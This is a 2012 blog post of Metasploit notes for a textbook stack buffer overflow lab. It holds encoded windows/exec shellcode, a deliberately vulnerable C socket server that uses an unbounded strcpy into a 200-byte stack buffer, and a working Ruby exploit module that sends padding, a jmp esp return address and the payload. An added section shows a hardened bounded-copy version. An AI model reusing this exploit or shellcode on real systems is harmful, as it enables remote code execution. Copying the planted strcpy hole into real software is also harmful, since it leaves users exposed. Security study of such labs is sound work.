Metasploit usage notes and attack test code
2012-09-11 17:43
1. When testing with the example from failwest's book, running exploit produced the message below, which means the Space value in 'Payload' is too small and simply needs to be increased. An example program for testing follows later in this post.
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.
2. If it reports that the module cannot be loaded, the rb file has a syntax error and must be corrected. The syntax may differ between versions; for example, the rb test code below cannot be loaded in the latest version, so take care when using it.
3. Testing was done with metasploit 3.4.0. During testing the sp2 and win 2000 addresses in targets turned out to be invalid, so [ 'Windows xp sp3', { 'Ret' => 0x7c86467b} ] was used; 0x7c86467b is a jmp esp address and the test succeeded with it. It was found by entering msfpescan -f -j esp c:/windows/system32/kernel32.dll in the metasploit console.
4. Common metasploit commands:
use <module name>
set payload XX
set rhost XX
set rport XX
set exitfunc seh
set cmd calc
set payload windows/exec
5. The configured shellcode is 223 bytes, so the 300 above can be changed to 223.
/*
* windows/exec - 223 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* EXITFUNC=process, CMD=calc
*/
unsigned char buf[] =
"\xd9\xe5\xbd\x20\x99\xb8\x99\x31\xc9\xd9\x74\x24\xf4\x5e\xb1"
"\x32\x83\xee\xfc\x31\x6e\x13\x03\x4e\x8a\x5a\x6c\x72\x44\x13"
"\x8f\x8a\x95\x44\x19\x6f\xa4\x56\x7d\xe4\x95\x66\xf5\xa8\x15"
"\x0c\x5b\x58\xad\x60\x74\x6f\x06\xce\xa2\x5e\x97\xfe\x6a\x0c"
"\x5b\x60\x17\x4e\x88\x42\x26\x81\xdd\x83\x6f\xff\x2e\xd1\x38"
"\x74\x9c\xc6\x4d\xc8\x1d\xe6\x81\x47\x1d\x90\xa4\x97\xea\x2a"
"\xa6\xc7\x43\x20\xe0\xff\xe8\x6e\xd1\xfe\x3d\x6d\x2d\x49\x49"
"\x46\xc5\x48\x9b\x96\x26\x7b\xe3\x75\x19\xb4\xee\x84\x5d\x72"
"\x11\xf3\x95\x81\xac\x04\x6e\xf8\x6a\x80\x73\x5a\xf8\x32\x50"
"\x5b\x2d\xa4\x13\x57\x9a\xa2\x7c\x7b\x1d\x66\xf7\x87\x96\x89"
"\xd8\x0e\xec\xad\xfc\x4b\xb6\xcc\xa5\x31\x19\xf0\xb6\x9d\xc6"
"\x54\xbc\x0f\x12\xee\x9f\x45\xe5\x62\x9a\x20\xe5\x7c\xa5\x02"
"\x8e\x4d\x2e\xcd\xc9\x51\xe5\xaa\x26\x18\xa4\x9a\xae\xc5\x3c"
"\x9f\xb2\xf5\xea\xe3\xca\x75\x1f\x9b\x28\x65\x6a\x9e\x75\x21"
"\x86\xd2\xe6\xc4\xa8\x41\x06\xcd\xca\x04\x94\x8d\x0c";
#include <iostream>
#include <cstring>
#include <cstdlib>
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
using namespace std;

// Deliberately vulnerable test target: strcpy copies the received data into a
// fixed 200-byte stack buffer with no length check, so a longer message
// overwrites the saved return address. Keep it this way for the exploit test.
void msg_display(char *buf)
{
    char msg[200];
    strcpy(msg,buf);
    cout<<"****************"<<endl;
    cout<<msg<<endl;
}

int main()
{
    SOCKET sock,msgsock;
    int length,receive_len;
    struct sockaddr_in sock_server,sock_client;
    char buf[0x200];
    WSADATA wsa;
    WSAStartup(MAKEWORD(1,1),&wsa);
    // SOCKET is unsigned, so compare against INVALID_SOCKET rather than < 0
    if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET)
    {
        cout<<"Socket Creating Error!"<<endl;
        exit(1);
    }
    memset(&sock_server,0,sizeof(sock_server));
    sock_server.sin_family=AF_INET;
    sock_server.sin_port=htons(7777);
    sock_server.sin_addr.S_un.S_addr=INADDR_ANY;
    if (bind(sock,(sockaddr *)&sock_server,sizeof(sock_server))==SOCKET_ERROR)
    {
        cout<<"binding stream socket error!"<<endl;
        exit(1);
    }
    cout<<"**********************************"<<endl;
    cout<<" exploit target server 1.0 "<<endl;
    cout<<"**********************************"<<endl;
    listen(sock,4);
    length=sizeof(struct sockaddr);
    do
    {
        msgsock=accept(sock,(struct sockaddr *)&sock_client,&length);
        // accept returns INVALID_SOCKET on failure, not 1
        if (msgsock==INVALID_SOCKET)
        {
            cout<<"accept error!"<<endl;
            break;
        }
        do
        {
            memset(buf,0,sizeof(buf));
            // leave one byte so the message is always NUL-terminated before strcpy
            if ((receive_len=recv(msgsock,buf,sizeof(buf)-1,0))<0)
            {
                cout<<"reading stream message error!"<<endl;
                receive_len=0;
            }
            msg_display(buf);
        }while(receive_len);
        closesocket(msgsock);
    } while (1);
    WSACleanup();
    return 0;
}
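The msg_display routine above overflows because strcpy has no bound. The following is an added example, not part of the original post, showing the hardened form of that routine plus a receive-side size check a defender would log on; the 427-byte sample length (200 + 4 + 223) is constructed from the exploit buffer layout described in this post.

```c
#include <stdio.h>
#include <string.h>

#define MSG_SIZE  200    /* same fixed stack buffer size as the post's msg_display */
#define RECV_SIZE 0x200  /* same receive buffer size as the post's main() */

/* Hardened replacement for msg_display: copies at most MSG_SIZE-1 bytes,
 * always NUL-terminates, and reports truncation instead of writing past
 * the end of msg[]. Returns the number of bytes copied. */
size_t msg_display_safe(const char *buf, size_t len, int *truncated)
{
    char msg[MSG_SIZE];
    size_t n = len < MSG_SIZE - 1 ? len : MSG_SIZE - 1;
    memcpy(msg, buf, n);
    msg[n] = '\0';
    *truncated = (len > MSG_SIZE - 1) ? 1 : 0;
    puts("****************");
    puts(msg);
    return n;
}

/* Receive-side check to run right after recv(): anything longer than the
 * display buffer can hold would have overflowed the original strcpy, so it
 * is worth logging as an oversized message. Returns 1 if oversized. */
int message_oversized(size_t received_len)
{
    return received_len > MSG_SIZE - 1;
}

/* Constructed input of `len` filler bytes standing in for data read by recv().
 * Returns what msg_display_safe copied; *truncated reports whether it cut. */
size_t check_sample(size_t len, int *truncated)
{
    char sample[RECV_SIZE];
    if (len >= RECV_SIZE)
        len = RECV_SIZE - 1;           /* recv() can never deliver more */
    memset(sample, 'A', len);
    sample[len] = '\0';
    return msg_display_safe(sample, len, truncated);
}

int main(void)
{
    int t = 0;
    /* 427 = 200 padding + 4 return address + 223 payload, the layout the post's module sends */
    size_t copied = check_sample(200 + 4 + 223, &t);
    printf("copied %zu bytes, truncated=%d, oversized=%d\n",
           copied, t, message_oversized(427));
    return 0;
}
```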
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'JYH testing Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow; an attacker may be able to execute arbitrary code.
      },
      'Author'         => [ 'JYH' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9262 $',
      'References'     =>
        [
          [ 'CVE', '2008-0226' ],
          [ 'OSVDB', '41195' ],
          [ 'BID', '27140' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'           => 300,
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000', { 'Ret' => 0x77F8948B } ],
          [ 'Windows xp sp2', { 'Ret' => 0x7C914393 } ],
          [ 'Windows xp sp3', { 'Ret' => 0x7c86467b } ], # jmp esp in kernel32.dll, found with msfpescan
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Jan 4 2012'))
  end

  def exploit
    print_status("Trying target")
    connect
    #sock.get_once
    #print_status("Trying target #{target.name}...")
    buf  = 'A' * 200                  # fills the 200-byte msg buffer in msg_display
    buf += [ target.ret ].pack('V')   # little-endian return address for the chosen target
    buf += payload.encoded
    sock.put(buf)
    handler
    disconnect
  end
end